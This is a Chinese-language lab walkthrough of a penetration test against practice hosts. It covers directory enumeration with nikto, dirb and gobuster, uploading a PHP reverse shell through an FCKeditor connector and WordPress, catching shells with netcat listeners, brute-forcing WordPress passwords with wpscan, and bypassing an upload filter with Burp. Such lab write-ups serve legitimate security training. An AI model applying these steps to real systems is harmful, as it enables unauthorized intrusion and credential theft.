知道是網頁,首先先查看有什麼目錄:
┌──(root㉿kali)-[~]
└─# nikto -host http://sales.itop.com.tw
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.1.134
+ Target Hostname: sales.itop.com.tw
+ Target Port: 80
+ Start Time: 2023-02-26 07:18:08 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 8d, size: 59770f4ca6fd6, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /public/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7941 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-02-26 07:22:42 (GMT-5) (274 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
查看有什麼目錄:
┌──(root㉿kali)-[~]
└─# nikto -host http://market.itop.com.tw
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.1.134
+ Target Hostname: market.itop.com.tw
+ Target Port: 80
+ Start Time: 2023-02-26 07:19:53 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 8d, size: 59770f1d49036, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/index.html: Admin login page/section found.
+ 7941 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-02-26 07:24:25 (GMT-5) (272 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
連連看主網頁:
連到到public,但也是連到主網頁:
發現沒有東西可以打,再用dirb,dirb可以亂猜可能的目錄,並測試是否真的存在:
┌──(root㉿kali)-[~]
└─# dirb http://sales.itop.com.tw/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Feb 27 00:40:16 2023
URL_BASE: http://sales.itop.com.tw/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://sales.itop.com.tw/ ----
+ http://sales.itop.com.tw/index.html (CODE:200|SIZE:141)
==> DIRECTORY: http://sales.itop.com.tw/public/
+ http://sales.itop.com.tw/server-status (CODE:403|SIZE:297)
==> DIRECTORY: http://sales.itop.com.tw/upload/
---- Entering directory: http://sales.itop.com.tw/public/ ----
==> DIRECTORY: http://sales.itop.com.tw/public/file/
==> DIRECTORY: http://sales.itop.com.tw/public/flash/
==> DIRECTORY: http://sales.itop.com.tw/public/image/
+ http://sales.itop.com.tw/public/index.html (CODE:200|SIZE:141)
==> DIRECTORY: http://sales.itop.com.tw/public/media/
---- Entering directory: http://sales.itop.com.tw/upload/ ----
+ http://sales.itop.com.tw/upload/index.html (CODE:200|SIZE:141)
---- Entering directory: http://sales.itop.com.tw/public/file/ ----
+ http://sales.itop.com.tw/public/file/index.html (CODE:200|SIZE:141)
---- Entering directory: http://sales.itop.com.tw/public/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://sales.itop.com.tw/public/image/ ----
+ http://sales.itop.com.tw/public/image/index.html (CODE:200|SIZE:141)
---- Entering directory: http://sales.itop.com.tw/public/media/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Feb 27 00:48:30 2023
DOWNLOADED: 23060 - FOUND: 6
對market也做一樣的事:
┌──(root㉿kali)-[~]
└─# dirb http://market.itop.com.tw
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Feb 27 00:41:28 2023
URL_BASE: http://market.itop.com.tw/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://market.itop.com.tw/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/
+ http://market.itop.com.tw/index.html (CODE:200|SIZE:141)
+ http://market.itop.com.tw/server-status (CODE:403|SIZE:298)
---- Entering directory: http://market.itop.com.tw/admin/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/
+ http://market.itop.com.tw/admin/index.html (CODE:200|SIZE:141)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/
+ http://market.itop.com.tw/admin/fckeditor/index.html (CODE:200|SIZE:141)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/_source/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/css/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/dialog/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/filemanager/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/images/
+ http://market.itop.com.tw/admin/fckeditor/editor/index.html (CODE:200|SIZE:141)
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/js/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/lang/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/plugins/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/skins/
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/_source/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/dialog/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/filemanager/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/skins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Feb 27 00:48:38 2023
DOWNLOADED: 18448 - FOUND: 5
連到market的其中一個目錄。
點進去connectors:
可以發現上傳頁面,先玩玩看:
點選Get Folders and Files,可以發現黑色區域會顯示一些文字:
再試試看Create Folder功能,創建test資料夾,看看會有什麼結果:
更改Current Folder跟Resource Type,看看結果:
這時如果爆破sales的目錄,可以發現剛剛market的修改卻卻反映到sales上:
再把剛剛用過的reverse shell的php重新命名並上傳:
上傳以後再去按下圖的1:
攻擊機監聽:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -lvnp 8082
listening on [any] 8082 ...
連到reverse shell的網址
問題:到底如何找上傳後的路徑?
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -lvnp 8082
listening on [any] 8082 ...
connect to [192.168.200.3] from (UNKNOWN) [172.16.1.134] 41602
Linux ubuntu 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
15:20:13 up 1 day, 1:18, 2 users, load average: 0.29, 0.10, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jason :0 :0 16Apr21 ?xdm? 58:30 0.10s init --user
jason pts/0 :0 15Dec21 439days 0.04s 0.04s bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
找特定檔案套路:
$ find / -type f -name secret.txt 2>/dev/null
/home/jason/Documents/secret.txt
$ cat /home/jason/Documents/secret.txt
Thr1amb0S
透過DMZ入侵
nmap掃過後發現80 port,用nikto看有哪些目錄:
┌──(root㉿kali)-[~]
└─# nikto -host http://172.16.1.134
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.1.134
+ Target Hostname: 172.16.1.134
+ Target Port: 80
+ Start Time: 2023-02-27 02:53:15 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2cf6, size: 597701736c404, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7923 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-02-27 02:56:14 (GMT-5) (179 seconds)
---------------------------------------------------------------------------
只找到預設文件:
再用dirb看有無更多目錄:
┌──(root㉿kali)-[~]
└─# dirb http://172.16.1.134
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Feb 27 02:58:51 2023
URL_BASE: http://172.16.1.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.1.134/ ----
+ http://172.16.1.134/index.html (CODE:200|SIZE:11510)
+ http://172.16.1.134/server-status (CODE:403|SIZE:292)
-----------------
END_TIME: Mon Feb 27 02:59:56 2023
DOWNLOADED: 4612 - FOUND: 2
gobuster是另一個暴力猜目錄的工具:
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt --url http://172.16.1.134
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.16.1.134
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/combined_directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/02/27 03:20:15 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 292]
Progress: 100187 / 1377711 (7.27%)[ERROR] 2023/02/27 03:23:41 [!] parse "http://172.16.1.134/error\x1f_log": net/url: invalid control character in URL
/.htpasswd (Status: 403) [Size: 288]
/.htaccess (Status: 403) [Size: 288]
/index.html (Status: 200) [Size: 11510]
/.hta (Status: 403) [Size: 283]
/.html (Status: 403) [Size: 284]
/.php (Status: 403) [Size: 283]
/.htm (Status: 403) [Size: 283]
/. (Status: 200) [Size: 11510]
/.php3 (Status: 403) [Size: 284]
/.phtml (Status: 403) [Size: 285]
/.htc (Status: 403) [Size: 283]
/.php5 (Status: 403) [Size: 284]
/.html_var_de (Status: 403) [Size: 291]
/.php4 (Status: 403) [Size: 284]
/.html. (Status: 403) [Size: 285]
/.html.html (Status: 403) [Size: 289]
/.htpasswds (Status: 403) [Size: 289]
/.htm. (Status: 403) [Size: 284]
/.htmll (Status: 403) [Size: 285]
/.phps (Status: 403) [Size: 284]
/.html.old (Status: 403) [Size: 288]
/.html.bak (Status: 403) [Size: 288]
/.ht (Status: 403) [Size: 282]
/.htm.htm (Status: 403) [Size: 287]
/.htgroup (Status: 403) [Size: 287]
/.html1 (Status: 403) [Size: 285]
/.html.printable (Status: 403) [Size: 294]
/.html.lck (Status: 403) [Size: 288]
/.htm.lck (Status: 403) [Size: 287]
/.htaccess.bak (Status: 403) [Size: 292]
/.html.php (Status: 403) [Size: 288]
/.htmls (Status: 403) [Size: 285]
/.htx (Status: 403) [Size: 283]
/.html- (Status: 403) [Size: 285]
/.htlm (Status: 403) [Size: 284]
/.htm2 (Status: 403) [Size: 284]
/.htuser (Status: 403) [Size: 286]
/.html_var_DE (Status: 403) [Size: 291]
/.html.LCK (Status: 403) [Size: 288]
/.htm.LCK (Status: 403) [Size: 287]
/.htm.d (Status: 403) [Size: 285]
/.htm.html (Status: 403) [Size: 288]
/.htacess (Status: 403) [Size: 287]
/.htmlprint (Status: 403) [Size: 289]
/.hts (Status: 403) [Size: 283]
/.html_files (Status: 403) [Size: 290]
/.html_ (Status: 403) [Size: 285]
/.html.sav (Status: 403) [Size: 288]
/.html.orig (Status: 403) [Size: 289]
/.html-1 (Status: 403) [Size: 286]
/.htm.old (Status: 403) [Size: 287]
/.htmlpar (Status: 403) [Size: 287]
/.htaccess.old (Status: 403) [Size: 292]
/.htm.bak (Status: 403) [Size: 287]
/.htm3 (Status: 403) [Size: 284]
/.htm.rc (Status: 403) [Size: 286]
/.html-- (Status: 403) [Size: 286]
/.html-0 (Status: 403) [Size: 286]
/.htm8 (Status: 403) [Size: 284]
/.htm_ (Status: 403) [Size: 284]
/.html-2 (Status: 403) [Size: 286]
/.html-c (Status: 403) [Size: 286]
/.htm7 (Status: 403) [Size: 284]
/.htm5 (Status: 403) [Size: 284]
/.html-old (Status: 403) [Size: 288]
/.html-p (Status: 403) [Size: 286]
/.html.htm (Status: 403) [Size: 288]
/.html.images (Status: 403) [Size: 291]
/.html.none (Status: 403) [Size: 289]
/.html.inc (Status: 403) [Size: 288]
/.html.pdf (Status: 403) [Size: 288]
/.html.txt (Status: 403) [Size: 288]
/.html.start (Status: 403) [Size: 290]
/.html4 (Status: 403) [Size: 285]
/.html_old (Status: 403) [Size: 288]
/.html7 (Status: 403) [Size: 285]
/.htmlbak (Status: 403) [Size: 287]
/.html5 (Status: 403) [Size: 285]
/.htmldolmetschen (Status: 403) [Size: 295]
/.htmlu (Status: 403) [Size: 285]
/.htmlq (Status: 403) [Size: 285]
/.htmlfeed (Status: 403) [Size: 288]
/.htmlc (Status: 403) [Size: 285]
/.htmla (Status: 403) [Size: 285]
/.htn (Status: 403) [Size: 283]
/.pht (Status: 403) [Size: 283]
/.htmlDolmetschen (Status: 403) [Size: 295]
/.htmlBAK (Status: 403) [Size: 287]
Progress: 1377681 / 1377711 (100.00%)
===============================================================
2023/02/27 04:08:23 Finished
===============================================================
常用列舉工具所屬種類:
bind shell?
另一個實驗環境:
起手式,當然是先nmap:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.1.222 172.16.1.176 172.16.19.9
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-27 03:25 EST
Nmap scan report for 172.16.1.222
Host is up (0.095s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.16.19.9
Host is up (0.042s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Nmap done: 3 IP addresses (2 hosts up) scanned in 54.84 seconds
看看80 port有什麼:
點上圖log in卻連不到
連不到的原因:
再次編輯/etc/hosts,新增下圖紅線那一行:
這一次就可以連到:
用wpscan來掃描弱點、帳號:
┌──(root㉿kali)-[~]
└─# wpscan --url http://wpress.itop.com.tw/ -e vt,vp,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://wpress.itop.com.tw/ [172.16.1.222]
[+] Started: Mon Feb 27 06:11:51 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://wpress.itop.com.tw/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://wpress.itop.com.tw/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://wpress.itop.com.tw/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://wpress.itop.com.tw/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.12 identified (Insecure, released on 2021-09-09).
| Found By: Rss Generator (Passive Detection)
| - http://wpress.itop.com.tw/index.php/feed/, <generator>https://wordpress.org/?v=5.2.12</generator>
| - http://wpress.itop.com.tw/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.12</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://wpress.itop.com.tw/wp-content/themes/twentynineteen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://wpress.itop.com.tw/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.4
| Style URL: http://wpress.itop.com.tw/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wpress.itop.com.tw/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:02 <> (493 / 493) 100.00% Time: 00:00:02
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] jason
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://wpress.itop.com.tw/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] alvin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] john
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] james
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Feb 27 06:11:59 2023
[+] Requests Done: 525
[+] Cached Requests: 39
[+] Data Sent: 142.959 KB
[+] Data Received: 164.905 KB
[+] Memory used: 261.918 MB
[+] Elapsed time: 00:00:07
知道了帳號,就可以爆破密碼:
┌──(root㉿kali)-[~]
└─# wpscan --url http://wpress.itop.com.tw -U "jason,tom,john,james,alvin" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://wpress.itop.com.tw/ [172.16.1.222]
[+] Started: Mon Feb 27 06:16:50 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://wpress.itop.com.tw/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://wpress.itop.com.tw/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://wpress.itop.com.tw/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://wpress.itop.com.tw/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.12 identified (Insecure, released on 2021-09-09).
| Found By: Rss Generator (Passive Detection)
| - http://wpress.itop.com.tw/index.php/feed/, <generator>https://wordpress.org/?v=5.2.12</generator>
| - http://wpress.itop.com.tw/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.12</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://wpress.itop.com.tw/wp-content/themes/twentynineteen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://wpress.itop.com.tw/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.4
| Style URL: http://wpress.itop.com.tw/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wpress.itop.com.tw/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wp-responsive-thumbnail-slider
| Location: http://wpress.itop.com.tw/wp-content/plugins/wp-responsive-thumbnail-slider/
| Last Updated: 2022-11-07T03:23:00.000Z
| [!] The version is out of date, the latest version is 1.1.9
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.1.1 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://wpress.itop.com.tw/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://wpress.itop.com.tw/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <=> (137 / 137) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - john / iloveyou
Trying james / 1q2w3e4r5t Time: 00:00:32 <> (1549 / 500051) 0.30% ETA: 02:56:1[SUCCESS] - alvin / apollo
...
[!] Valid Combinations Found:
| Username: john, Password: iloveyou
| Username: alvin, Password: apollo
| Username: tom, Password: P@ssw0rd
| Username: james, Password: 1qaz@WSX
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Feb 27 07:18:41 2023
[+] Requests Done: 167102
[+] Cached Requests: 5
[+] Data Sent: 86.113 MB
[+] Data Received: 98.724 MB
[+] Memory used: 265.68 MB
[+] Elapsed time: 01:01:51
用john的帳密登入,看plugin:
找找最下面的plugin有沒有弱點:
┌──(root㉿kali)-[~]
└─# msfconsole
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|
=[ metasploit v6.3.2-dev ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use the edit command to open the
currently active module in your editor
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search Thumbnail
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/fileformat/evince_cbt_cmd_injection 2017-07-13 excellent No Evince CBT File Command Injection
1 exploit/windows/fileformat/ms11_006_createsizeddibsection 2010-12-15 great No MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
2 exploit/linux/http/railo_cfml_rfi 2014-08-26 excellent Yes Railo Remote File Include
3 exploit/multi/http/wp_responsive_thumbnail_slider_upload 2015-08-28 excellent Yes WordPress Responsive Thumbnail Slider Arbitrary File Upload
Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/wp_responsive_thumbnail_slider_upload
可以發現其實此poc適用於1.0,但現在是1.1所以失敗,但可以試試別的user,但alvin也失敗。
既然wp的外掛不行,那就只好傳傳看reverse shell:
上傳步驟:
注意上傳前開啟burp suite,並開啟itersept,如果itersept跳出字,就點左上角forward。
而上傳後,可能出現:
代表被擋下來。
看看intercept:
在forward途中,出現以上畫面時,把.jpg這些字刪掉再繼續forward,看能不能躲避檢查。
forward完成後(變回空白),把intercept關掉,再看看:
可以發現成功上傳,上圖反白處就可以得知上傳到哪裡,所以可以先讓攻擊機監聽了:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -lvnp 8083
listening on [any] 8083 ...
連到reverse shell網址:
這時攻擊機就可以get shell:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -lvnp 8083
listening on [any] 8083 ...
connect to [192.168.200.3] from (UNKNOWN) [172.16.1.222] 44484
Linux localhost.localdomain 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2 (2019-08-28) x86_64 GNU/Linux
07:06:44 up 16:04, 1 user, load average: 0.36, 0.33, 0.29
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jason :1 :1 21May21 ?xdm? 14:38 0.02s /usr/lib/gdm3/gdm-x-session --run-script /usr/bin/gnome-session
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
aaa查看一下這一台IP有沒有機會連到真正想打的端點:
$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:15:5d:0a:66:05 brd ff:ff:ff:ff:ff:ff
inet 172.16.1.222/16 brd 172.16.255.255 scope global noprefixroute eth0
valid_lft forever preferred_lft forever
inet6 fe80::215:5dff:fe0a:6605/64 scope link noprefixroute
valid_lft forever preferred_lft forever
ping 一下:
$ ping 172.20.20.5
